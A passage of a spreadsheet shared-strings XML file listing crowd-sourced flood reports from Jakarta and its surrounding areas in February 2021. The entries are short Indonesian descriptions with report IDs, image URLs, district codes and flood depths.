    <t>https://lh3.googleusercontent.com/b-3XeZ_ZAL8kxbll0yX3QM2WlGhiZza1cAGUy2t9SR5kXruDBGgvmKzFy_XbpGtaHLxQkaq8wuSSqTi0_4ezpsX3eMJSNYHWKtkaqWooLaM=s480-c</t>
  </si>
  <si>
    <t>#BanjirKecil #BanjirKiriman #KaliMeluap</t>
  </si>
  <si>
    <t>edd6a3f1-f0e6-4856-a5cd-719e4a841a39</t>
  </si>
  <si>
    <t>https://images.petabencana.id/edd6a3f1-f0e6-4856-a5cd-719e4a841a39.jpg</t>
  </si>
  <si>
    <t>Banjir semakin tinggi sudah sedengkul orang dewasa dan semakin naik</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/xwO5_HRbiSWxmRlDHb7tPPu3nFq-rYgZhX6jNFeq7sKUq1LSl-vVHeM0bmeLFdRj_4BAK-dxDT0np04c9y9bFlO2bhuG2eBcMRKQMC33wg=s480-c</t>
  </si>
  <si>
    <t>Baru surut banjir datang lagi karena hujan dengan instensitas yang tinggi di RT01 RT04 Cipinang Melayu #KaliMeluap #BanjirKiriman #hujan extreme</t>
  </si>
  <si>
    <t>4dbe2215-5c82-4868-b1e9-a31d316e6868</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4dbe2215-5c82-4868-b1e9-a31d316e6868.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "984", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir banjir ini udah paling besar dari sebelum nya</t>
  </si>
  <si>
    <t>0d46326e-fa4a-4a96-b241-2a93555c5ca4</t>
  </si>
  <si>
    <t>Banjir naik pukul 1.30 dini hari</t>
  </si>
  <si>
    <t>faf2e6c1-236c-4a58-a32d-59254ad02f04</t>
  </si>
  <si>
    <t>https://images.petabencana.id/faf2e6c1-236c-4a58-a32d-59254ad02f04.jpg</t>
  </si>
  <si>
    <t>Banjir di Komplek antilop Jl cendrawasih Kel jaticempaka pondok Gede Bekasi</t>
  </si>
  <si>
    <t>9310fc40-a588-40e8-a2b5-159011a5e6f3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9310fc40-a588-40e8-a2b5-159011a5e6f3.jpg</t>
  </si>
  <si>
    <t>20-02-2021 jam 02:00 banjir setinggi ?30 cm di perumahan pondok lakah paninggilan ciledug tangerang banten</t>
  </si>
  <si>
    <t>252bd970-1135-4d5e-aa90-4fb1481277f6</t>
  </si>
  <si>
    <t>32e267ac-ffcb-455d-b2c8-43608afc34db</t>
  </si>
  <si>
    <t>337fb970-4f7d-4fe0-85f8-ba349dc88c5f</t>
  </si>
  <si>
    <t>bdbf486e-1dbb-482a-8f30-f578d287fac9</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1339", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Kali Krukut Karet Semanggi meluap</t>
  </si>
  <si>
    <t>1c787693-f7de-4234-b11a-04b0da8b74ed</t>
  </si>
  <si>
    <t>34ca3c72-29e9-4935-a1a6-124fbec5c8b6</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1157", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>513bf8e7-a095-4472-acc8-03457a00c735</t>
  </si>
  <si>
    <t>https://images.petabencana.id/513bf8e7-a095-4472-acc8-03457a00c735.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 155 }</t>
  </si>
  <si>
    <t>Banjir di komplek sangrila indah 2, Petukangan Selatan, Kec. Pesanggrahan,Jaksel, belum ada petugas..........................,</t>
  </si>
  <si>
    <t>f63efb09-cb2e-4817-8174-a138a026a67f</t>
  </si>
  <si>
    <t>409d787c-6562-410b-9fca-fb68f32a7b16</t>
  </si>
  <si>
    <t>36ccc244-9787-4533-9bbe-e90218eb9a05</t>
  </si>
  <si>
    <t>https://images.petabencana.id/36ccc244-9787-4533-9bbe-e90218eb9a05.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1140", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di wilayah Kemang Timur XV RT.010 RW.003 Jakarta Selatan butuh bantuan</t>
  </si>
  <si>
    <t>22dfe580-b436-4223-a904-b7b3c73405b2</t>
  </si>
  <si>
    <t>https://images.petabencana.id/22dfe580-b436-4223-a904-b7b3c73405b2.jpg</t>
  </si>
  <si>
    <t>8c0e0650-6d41-4314-abd6-90e6088a593b</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1644", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kelapa dua wetan rt. 002/02</t>
  </si>
  <si>
    <t>0e4a25ac-dcbe-45a9-ad21-3e8fd8e74075</t>
  </si>
  <si>
    <t>https://images.petabencana.id/0e4a25ac-dcbe-45a9-ad21-3e8fd8e74075.jpg</t>
  </si>
  <si>
    <t>{ "points": 0, "flood_depth": 75, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Bekasi Timur Regensi 3, luapan kali Pete jam 1 sudah banjir hingga sekarang 3:30 masih menaik, ketinggian hampir lutut orang dewasa, hujan</t>
  </si>
  <si>
    <t>9e52730c-bb2e-4594-bc35-04b8de5e1996</t>
  </si>
  <si>
    <t>https://images.petabencana.id/9e52730c-bb2e-4594-bc35-04b8de5e1996.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1271", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/zGJw5ow93LiA4GYcksafFshopBRqUjQHQNMJP2RdfhjJRRGmAUoS878gWbU1vCCHRj7kGLhaDye2a1N_e9pvp5PgvPusOwh_WM1cGig9=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap #BanjirKecil #BanjirBandang #BanjirKiriman  genangan colklay  lagiii belum ada solusi solusi</t>
  </si>
  <si>
    <t>8a8205f8-a2a8-4420-b581-35d701bc9008</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8a8205f8-a2a8-4420-b581-35d701bc9008.jpg</t>
  </si>
  <si>
    <t>Di margi utami dan vida bekasi</t>
  </si>
  <si>
    <t>Padurenan</t>
  </si>
  <si>
    <t>5c62747a-367c-40c5-9f75-676e2bad6fd1</t>
  </si>
  <si>
    <t>Di rt 11 rw 01</t>
  </si>
  <si>
    <t>04d4b205-9cb6-41a3-ab88-623992a92ac1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/04d4b205-9cb6-41a3-ab88-623992a92ac1.jpg</t>
  </si>
  <si>
    <t>Kompleks Buncit Persada</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/b0UGQbp7lc1kkgZUUVt-6Z2Tj9lTTKTJsbF_qr68whVdsboc91xQVABVun6k8iOnyAehw5ldY6zrgLB2PPcZ3dEAr6TjzI_7YwtAqVFnbQ=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1604", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir banjorrr....tolong tolong banjirrrr</t>
  </si>
  <si>
    <t>280bf816-7187-468b-8375-d4039f505dd4</t>
  </si>
  <si>
    <t>https://images.petabencana.id/280bf816-7187-468b-8375-d4039f505dd4.jpg</t>
  </si>
  <si>
    <t>Banjir Wilayah Binong Permai Blok I , Binong Curug Tangerang</t>
  </si>
  <si>
    <t>91055ddb-2f43-4934-8d37-b79b948b7d90</t>
  </si>
  <si>
    <t>https://images.petabencana.id/91055ddb-2f43-4934-8d37-b79b948b7d90.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 109 }</t>
  </si>
  <si>
    <t>Ada tanggul jebol di saluran kali khong guan di RT.13 RW.07 Susukan-Ciracas. Titik kenal kantor RW.07</t>
  </si>
  <si>
    <t>afa216a1-bfa6-4405-9695-dcaa2be6626d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/afa216a1-bfa6-4405-9695-dcaa2be6626d.jpg</t>
  </si>
  <si>
    <t>Banjir setinggi 70 cm di perumahan Griya Timur Indah Bekasi.</t>
  </si>
  <si>
    <t>f7651d3f-0840-4220-8889-ea9be82b9d8e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f7651d3f-0840-4220-8889-ea9be82b9d8e.jpg</t>
  </si>
  <si>
    <t>a86f1e3a-1b94-4ad6-8533-a39109354a3e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a86f1e3a-1b94-4ad6-8533-a39109354a3e.jpg</t>
  </si>
  <si>
    <t>Banjir kawasan danau limboto dan pasar modern karawaci</t>
  </si>
  <si>
    <t>fa66f5d0-0418-4e86-aa8c-550d2d7c7c9c</t>
  </si>
  <si>
    <t>Jalan Pancoran Barat.</t>
  </si>
  <si>
    <t>3c827822-69ac-4aea-801b-14acc602dfeb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3c827822-69ac-4aea-801b-14acc602dfeb.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1206", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di sekitar pancoran barat xi-c karena curah hujan lebat sejak semalam. ketinggian air bervariasi menggenangi jalanan.</t>
  </si>
  <si>
    <t>38cdcf04-d054-4845-aeaa-a9780d51594d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/38cdcf04-d054-4845-aeaa-a9780d51594d.jpg</t>
  </si>
  <si>
    <t>{ "points": 1, "flood_depth": 199, "report_type": "flood" }</t>
  </si>
  <si>
    <t>banjir ikpn bintaro +- 3,5 meter</t>
  </si>
  <si>
    <t>e13041e0-6385-45d5-b37c-79b602635d7f</t>
  </si>
  <si>
    <t>Komplek Mediterania Regency cikunir</t>
  </si>
  <si>
    <t>4cb05d92-580d-4b5a-bae3-30617995a19d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4cb05d92-580d-4b5a-bae3-30617995a19d.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "143", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/YxHbi1-t1MvK9xibCQwghVwbXQ9mxIU44ZMg11WINrsTC81lOxsj5rAJ8SlzbGr5o4cm2Q1EGW_X-pB0XXYdzNOGydzSt1P70HSEFbIWGg=s480-c</t>
  </si>
  <si>
    <t>tolong pak banjir di jl. h. hanafi udah sedada butuh bantuan untuk evakuasi. banyak yg masih terjebak didalam rumah</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/SnH431x1YHOVfiyAofF59_IBkgcgX3NjQdQbGoqfwlTWmOXjuQa470vvLbDhHTvRWL2lN_Nb7rpNeQKiWzwKGcxEWR6eiKSiwJad07cFuQ=s480-c</t>
  </si>
  <si>
    <t>banjir lagi malah semakin besar dibanding yg kemarin di jl sd inpres, kelurahan rambutan, kec ciracas, tolong dibantu solusinya #KerukKali</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/4DRmeYZM1dXpWtvTUFMQqpMsEg0PpyB1dSOPuF3kFDuqChC-zv21P-KspKyOuv3x_QsRy8QdMDWyUJv3KgIkfvhukVS-hs9vUWhm9DxL=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1292", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir lagi banjir lagi Jl. Bintaro Permai Raya. jalan tergenang karena saluran pembuangan air sangat kecil, kami sudah laporan sebelumnya yang dikerjakan cuma memberihkan lubang saluran padahal yang kami minta menambah lubang di trotoar supaya air tidak</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/TOZi2sPrzSLex4thDr9aK14ARkns3gWVtJEbLCHSmTrFta74FA4q1rE35zwln5e7iXSrgoPsBLaSRJP46WMiWH2632Udp7tJIB6AU2kXyw=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1208", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>kelurahan jati padang</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vLF4_LirPyb1VDPAp9fmZIrvTNUttV_qUe1zY-YQVfPzPyHa3AyQv1FL2Mt_Dbw0F2hB7XSrXMrBpGQgC8ceCzIPs-pPLYP3XvijE7AtYQ=s480-c</t>
  </si>
  <si>
    <t>banjiir, jl.cidodol komp loka permai, grosel keb lama jaksel, suruh airnya masuk tanah!</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/NngxGYm0_pKhmterpnu1aAD6E9mcWD4lRUrSznp0RfXFqR_feMHVeHoSUb2T5Wc7wdIcrT7XMwfZBoPY0qzYb6Hp2zndSzRmpC7eUUoUfxU=s480-c</t>
  </si>
  <si>
    <t>#KaliMeluap Tolong Portal? pintu masuk wilayah Di tutup donk, lalu Lalang Mobil masuk perumahan bikin gelombang air semakin parah masuk kedalam Rumah #PelayananLurah #PelayananKantorKesehatan #PelayananPTSP</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/CNhl6ANIPoV8D5_JlAZnO7gM3gWIR5xWHv9vPoRmQvTkd4G-D3_280S278DN96EDLLGVFRtnf1BBnvZLtEuPtP9NWZ19Hgspe8U7woee-g=s480-c</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1237", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>banjir di kokplek nuansa kebagusan 99 &amp; sekitarnya. mohon agar saluran air dilebarkan. kejadian ini sdh sering kami laporkan namun blm ada penyelesaian hingga saait ini</t>
  </si>
  <si>
    <t>49fecb06-0d76-40b4-b851-f6a61f354450</t>
  </si>
  <si>
    <t>Banjir datang dari anak kali Angke. Terjadi sekitar pukul 01.30 WIB</t>
  </si>
  <si>
    <t>43329210-08a9-4534-9daf-e3644c18b51c</t>
  </si>
  <si>
    <t>banjir dari luapan air yang berasal dari tanah kosong samping tol</t>
  </si>
  <si>
    <t>6defbc71-3e9f-432e-9800-7138cc7ef5e7</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6defbc71-3e9f-432e-9800-7138cc7ef5e7.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1284", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>2916ae6b-9c13-4229-aefb-ddcd042b7df8</t>
  </si>
  <si>
    <t>{ "district_id": "3173", "local_area_id": "2438", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir petamburan</t>
  </si>
  <si>
    <t>8ee24e9b-c373-49de-be5a-1555971af2b5</t>
  </si>
  <si>
    <t>https://images.petabencana.id/8ee24e9b-c373-49de-be5a-1555971af2b5.jpg</t>
  </si>
  <si>
    <t>7af8a7bb-0b45-47c7-9f1b-654c2ee07095</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7af8a7bb-0b45-47c7-9f1b-654c2ee07095.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1275", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Lokasi terparah di gang pahala bawah,tgl 19 feb 2021 pukul 23.00 WIB hingga 20 feb 21 pukul 05.30 ketinggian banjir hingga dada orang dewasa</t>
  </si>
  <si>
    <t>b1fea82e-3cdb-4f11-bfe1-43447a7ecdb0</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b1fea82e-3cdb-4f11-bfe1-43447a7ecdb0.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 110, "report_type": "flood" }</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "815", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir Jl. Poncol II Gandaria selatan Cilandak Jakarta selatan"</t>
  </si>
  <si>
    <t>7ce3dbad-40fd-47e0-b5b2-ea3ab1388c56</t>
  </si>
  <si>
    <t>https://images.petabencana.id/7ce3dbad-40fd-47e0-b5b2-ea3ab1388c56.jpg</t>
  </si>
  <si>
    <t>Banjir di Jl. Beringin Raya Jatibening Dua</t>
  </si>
  <si>
    <t>a505db84-dc19-492c-b597-8cff7fd9df8b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a505db84-dc19-492c-b597-8cff7fd9df8b.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "934", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir di gang bunga lenteng agung jagakarsa</t>
  </si>
  <si>
    <t>Lenteng Agung</t>
  </si>
  <si>
    <t>4ef64b6f-d7fb-4158-9bfd-3341bacea3d9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4ef64b6f-d7fb-4158-9bfd-3341bacea3d9.jpg</t>
  </si>
  <si>
    <t>Banjir hampir 1,5 meter, debit banjir masih terus naik. Asa nenek yg butuh bantuan evakuasi perahu karet di jl maharta X</t>
  </si>
  <si>
    <t>100f53f0-f339-4758-be07-902f4c77673d</t>
  </si>
  <si>
    <t>https://images.petabencana.id/100f53f0-f339-4758-be07-902f4c77673d.jpg</t>
  </si>
  <si>
    <t>Banjir sedada orang dewasa . .</t>
  </si>
  <si>
    <t>264add4f-0779-4e99-ae8e-fab611b97f9f</t>
  </si>
  <si>
    <t>https://images.petabencana.id/264add4f-0779-4e99-ae8e-fab611b97f9f.jpg</t>
  </si>
  <si>
    <t>Perumahan puri gading, cluster tampak siring</t>
  </si>
  <si>
    <t>14955bec-abc0-42c2-ad64-0423fcb49d59</t>
  </si>
  <si>
    <t>{ "district_id": "3171", "local_area_id": "1280", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir jalan perintis</t>
  </si>
  <si>
    <t>714ff32e-4105-494b-b163-099cd49e0e1d</t>
  </si>
  <si>
    <t>Kemarin sempat surut. Malam ini kerendam lagi.</t>
  </si>
  <si>
    <t>Serang Baru</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/vssbS6vGxOwjHrY8BRWRS7iVtZdsp-el7rAbln8fL3zOQMbdsbpNViFIEnAPm9H6IdokiPBFfOzJVI_3H8CcU3X1qcopEJD_RVPbftki0A=s480-c</t>
  </si>
  <si>
    <t>#KaliKotor #KerukKali #SampahDiKali. banjir banjir banjir</t>
  </si>
  <si>
    <t>2f5ffcf4-883b-4f96-911c-bbfcef20fc52</t>
  </si>
  <si>
    <t>https://images.petabencana.id/2f5ffcf4-883b-4f96-911c-bbfcef20fc52.jpg</t>
  </si>
  <si>
    <t>dd8424c3-e4ea-4c87-b8a9-87dcfa9f1900</t>
  </si>
  <si>
    <t>Banjir gg perintis</t>
  </si>
  <si>
    <t>6785ce5e-04e1-495b-a970-2a3a25451c2e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/6785ce5e-04e1-495b-a970-2a3a25451c2e.jpg</t>
  </si>
  <si>
    <t>Banjir di pulo raya, kel petogogan</t>
  </si>
  <si>
    <t>3fe32ef6-7025-48ab-8e1e-fef626f80923</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3fe32ef6-7025-48ab-8e1e-fef626f80923.jpg</t>
  </si>
  <si>
    <t>Banjir terus meninggi, saat ini di luar rumah tinggi airnya sepinggang orang dewasa.</t>
  </si>
  <si>
    <t>ecf06878-48dc-440a-94e2-1b49e05e9055</t>
  </si>
  <si>
    <t>https://images.petabencana.id/ecf06878-48dc-440a-94e2-1b49e05e9055.jpg</t>
  </si>
  <si>
    <t>Banjir jalan damai Raya, Bambu Apus, Cipayung</t>
  </si>
  <si>
    <t>5e64ab10-7c66-4676-8bbb-4bc33b86d858</t>
  </si>
  <si>
    <t>https://images.petabencana.id/5e64ab10-7c66-4676-8bbb-4bc33b86d858.jpg</t>
  </si>
  <si>
    <t>b686f954-548c-4b87-b108-803187792ac6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b686f954-548c-4b87-b108-803187792ac6.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1615", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Posisi luar rumah tingginya 70cm, dan masuk ke dalam rumah sebetis orang dewasa</t>
  </si>
  <si>
    <t>133219a9-964f-4bc5-8167-c0741f68188a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/133219a9-964f-4bc5-8167-c0741f68188a.jpg</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 150, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir di kelurahan Petogogan rt 5 rw 3 Kebayoran Baru. Belum ada tim sar</t>
  </si>
  <si>
    <t>0527e349-dd25-46a2-b7a7-11388577ed0b</t>
  </si>
  <si>
    <t>{ "points": -1, "flood_depth": 59, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Di luar pagar dah sepaha orang dewasa, dalam rumah sedengkul...</t>
  </si>
  <si>
    <t>738823e9-0e83-47ae-87f9-943036292055</t>
  </si>
  <si>
    <t>https://images.petabencana.id/738823e9-0e83-47ae-87f9-943036292055.jpg</t>
  </si>
  <si>
    <t>3e34378a-e957-4627-857f-3c563a9db1c6</t>
  </si>
  <si>
    <t>https://images.petabencana.id/3e34378a-e957-4627-857f-3c563a9db1c6.jpg</t>
  </si>
  <si>
    <t>Perumahan Bekasi Griya Asri I, Blok C, Sumberjaya, Tambun Selatan, Kab. Bekasi</t>
  </si>
  <si>
    <t>b05c2056-82f5-4195-bd65-34130d6eb0f9</t>
  </si>
  <si>
    <t>https://images.petabencana.id/b05c2056-82f5-4195-bd65-34130d6eb0f9.jpg</t>
  </si>
  <si>
    <t>banjir di pondok safari indah jalan cendrawasih raya pada 20 februari 2021 pukul 06.00 pagi</t>
  </si>
  <si>
    <t>ec29acea-c065-4ea5-8127-eabab748e671</t>
  </si>
  <si>
    <t>Banjir setinggi lutut orang dewasa sejak pukul 2 dini hari</t>
  </si>
  <si>
    <t>Kunciran</t>
  </si>
  <si>
    <t>e55b13c2-98a1-4e90-8d51-48bc7cc1ae01</t>
  </si>
  <si>
    <t>Banjir sekitaran halim kebon pala Jakarta timur ketinggian air sudah lebih dari 1 meter</t>
  </si>
  <si>
    <t>99fdab9d-a708-4d96-b660-fa1b70205659</t>
  </si>
  <si>
    <t>https://images.petabencana.id/99fdab9d-a708-4d96-b660-fa1b70205659.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3174", "local_area_id": "213", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Seminggu sudah masuk rumah 3 kali. Tinggi air 30-50 cm moh</t>
  </si>
  <si>
    <t>41e76061-c3b8-4e87-bf73-575f10dd37f6</t>
  </si>
  <si>
    <t>Banjir pondok maharta setinggi dada orang dewasa</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/lCPsUqzisW4SVarlSD1OE5MmIjuKXv3hQI48PaqAK9Cp3M3c7k_mI2iQu8u4bZT7JuXI-AR3_UVN0dbSOGz5CeYe_o6gBseaHBZAD5-7=s480-c</t>
  </si>
  <si>
    <t>info gang setiabudi srengseng sawah jagakarsa  banjir sebetis dewasa</t>
  </si>
  <si>
    <t>cead10e7-4368-4d7e-94d6-55072b986157</t>
  </si>
  <si>
    <t>https://images.petabencana.id/cead10e7-4368-4d7e-94d6-55072b986157.jpg</t>
  </si>
  <si>
    <t>e0a6c797-42a0-4b23-a4dc-b5a3d8999b5e</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e0a6c797-42a0-4b23-a4dc-b5a3d8999b5e.jpg</t>
  </si>
  <si>
    <t>Komplek jatipadang baru pasar minggu</t>
  </si>
  <si>
    <t>d47d247a-66ab-44c2-a24c-9f9fe09bee2b</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d47d247a-66ab-44c2-a24c-9f9fe09bee2b.jpg</t>
  </si>
  <si>
    <t>Banjir jalan damai Raya, Bambu Apus, cipayung</t>
  </si>
  <si>
    <t>f3790433-a30d-4758-b4b1-3695a26c7fef</t>
  </si>
  <si>
    <t>https://images.petabencana.id/f3790433-a30d-4758-b4b1-3695a26c7fef.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1253", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Banjir sejak jam 1 malam di gg masjid alhawi 1</t>
  </si>
  <si>
    <t>85006218-1b89-4c40-b04f-608566ea31aa</t>
  </si>
  <si>
    <t>https://images.petabencana.id/85006218-1b89-4c40-b04f-608566ea31aa.jpg</t>
  </si>
  <si>
    <t>Banjir dari jam 12 malam hingga sekarang belum surut</t>
  </si>
  <si>
    <t>e8c492b1-9d42-47ee-9a8e-80755fb5192c</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e8c492b1-9d42-47ee-9a8e-80755fb5192c.jpg</t>
  </si>
  <si>
    <t>Banjir memasuki kawasan rumah, air belum mulai surut sedikitpun, mobil dan motor sudah dipastikan tidak bisa masuk</t>
  </si>
  <si>
    <t>a0c7a2d6-49c1-43c4-a9fd-a1cb5dfa3a43</t>
  </si>
  <si>
    <t>https://images.petabencana.id/a0c7a2d6-49c1-43c4-a9fd-a1cb5dfa3a43.jpg</t>
  </si>
  <si>
    <t>80e1c412-142d-421f-8c32-91eeb8bd3686</t>
  </si>
  <si>
    <t>https://images.petabencana.id/80e1c412-142d-421f-8c32-91eeb8bd3686.jpg</t>
  </si>
  <si>
    <t>Banjir sejak tgl 19 februari dan hari ini lg, hujan tidak berhenti sedari malam sampai subuh. Kalo kemarin baru surut sekitar jam 4 sore.</t>
  </si>
  <si>
    <t>https://lh3.googleusercontent.com/Be5IGUsdJ2QqQ6pXz_VqnWkZW2d63u4juyU3tDLH083Rp1z_cMonKAewAf54ul3O5gA6i243dkMWZcsILUal0CSA3YoWRhyAhP-Iarh81w=s480-c</t>
  </si>
  <si>
    <t>Banjir Di cipinang bali II RT 12 Rw 13, Kelurahan Cipinang Muara, ketinggian air dari dada sampai leher orang dewasa, Hari ini Sabtu 20/2/21 banjir lebih besar dari hari kemarin,</t>
  </si>
  <si>
    <t>d2b8b2b6-3564-462d-99a6-28a87742b5e1</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d2b8b2b6-3564-462d-99a6-28a87742b5e1.jpg</t>
  </si>
  <si>
    <t>{ "points": -2, "flood_depth": 93, "report_type": "flood" }</t>
  </si>
  <si>
    <t>Banjir sedada di jalan haji asnawi, jati padang mohon bantuannya ????</t>
  </si>
  <si>
    <t>aacf6515-0afa-4147-913e-17e27abf0db3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/aacf6515-0afa-4147-913e-17e27abf0db3.jpg</t>
  </si>
  <si>
    <t>Banjir di jalan raya industri pasir gombong Cikarang utara"</t>
  </si>
  <si>
    <t>Pasirgombong</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357965</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/pasma/2021/02/20/16137742501119999127.jpg</t>
  </si>
  <si>
    <t>Banjir Mulai Menyatroni Kawasan Mampang Hingga Sedada</t>
  </si>
  <si>
    <t>Dear Detik, Banjir Jl Kemang Timur Dalam Gg. Buni RT. 003 RW. 003 Bangka Mampang Prapatan Jakarta Selatan.? Banjir Dimulai dari Jam 23.30 hingga saat ini  ketinggian bervariasi dari 1Cm hingga yg terdalam sedada orang Dewasa. Banjir dikarenakan t"</t>
  </si>
  <si>
    <t>https://pasangmata.detik.com/contribution/357967</t>
  </si>
  <si>
    <t>https://akcdn.detik.net.id/community/data/media/thumbs-pasangmata/2021/02/20/357967-16137784791956090528.mp4-03.jpg</t>
  </si>
  <si>
    <t>Banjir Tak Kunjung Surut, Anak-Anak Tetap Berburu Ikan</t>
  </si>
  <si>
    <t>Banjir belum Surut Jl. Kemang Timur Dalam RT. 003 RW. 003 Gg. Buni</t>
  </si>
  <si>
    <t>d0868631-2a27-4b81-b381-933a28035755</t>
  </si>
  <si>
    <t>https://images.petabencana.id/d0868631-2a27-4b81-b381-933a28035755.jpg</t>
  </si>
  <si>
    <t>Banjir sedada di Jalan Haji Asnawi, Jati Padang, Pasar Minggu, Jakarta Selatan.</t>
  </si>
  <si>
    <t>222e7c93-c7fb-4a52-ab0f-01595aefaf73</t>
  </si>
  <si>
    <t>https://images.petabencana.id/222e7c93-c7fb-4a52-ab0f-01595aefaf73.jpg</t>
  </si>
  <si>
    <t>{ "report_type": "flood", "flood_depth": 142 }</t>
  </si>
  <si>
    <t>e3deaf0d-4db3-4f3e-978a-3cd72517cd5a</t>
  </si>
  <si>
    <t>https://images.petabencana.id/e3deaf0d-4db3-4f3e-978a-3cd72517cd5a.jpg</t>
  </si>
  <si>
    <t>Tidak bisa dilewati. Ketinggian air di bagian utara Perumahan Duta Indah lebih tinggi dari titik ini</t>
  </si>
  <si>
    <t>35124c3d-b4c2-48d2-9bcf-41932ef4e581</t>
  </si>
  <si>
    <t>https://images.petabencana.id/35124c3d-b4c2-48d2-9bcf-41932ef4e581.jpg</t>
  </si>
  <si>
    <t>Banjir sampai ke dengkul orang dewasa</t>
  </si>
  <si>
    <t>f8fe6b3b-cf5f-4bea-94fe-06ca576fbf63</t>
  </si>
  <si>
    <t>Luapan dari sungai di sebelah jalan raya bogor...</t>
  </si>
  <si>
    <t>4151f6a8-9958-4591-be4f-84d03036afd3</t>
  </si>
  <si>
    <t>https://images.petabencana.id/4151f6a8-9958-4591-be4f-84d03036afd3.jpg</t>
  </si>
  <si>
    <t>Banjir seleher mohon bantuan perahu karetnya ????</t>
  </si>
  <si>
    <t>93e20b12-c631-4ac1-a497-93074c9763fb</t>
  </si>
  <si>
    <t>https://images.petabencana.id/93e20b12-c631-4ac1-a497-93074c9763fb.jpg</t>
  </si>
  <si>
    <t>{ "district_id": "3172", "local_area_id": "1882", "instance_region_code": "ID-JK" }</t>
  </si>
  <si>
    <t>Di daerah Jl. Jengki (no. 126) Kebon Pala, Makasar, banjir sudah masuk ke rumah2 lebih dari lutut selama dua hari ini</t>
  </si>
  <si>
